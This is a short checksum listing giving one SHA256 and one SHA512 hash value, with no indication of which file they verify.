SHA256d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e
SHA512f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5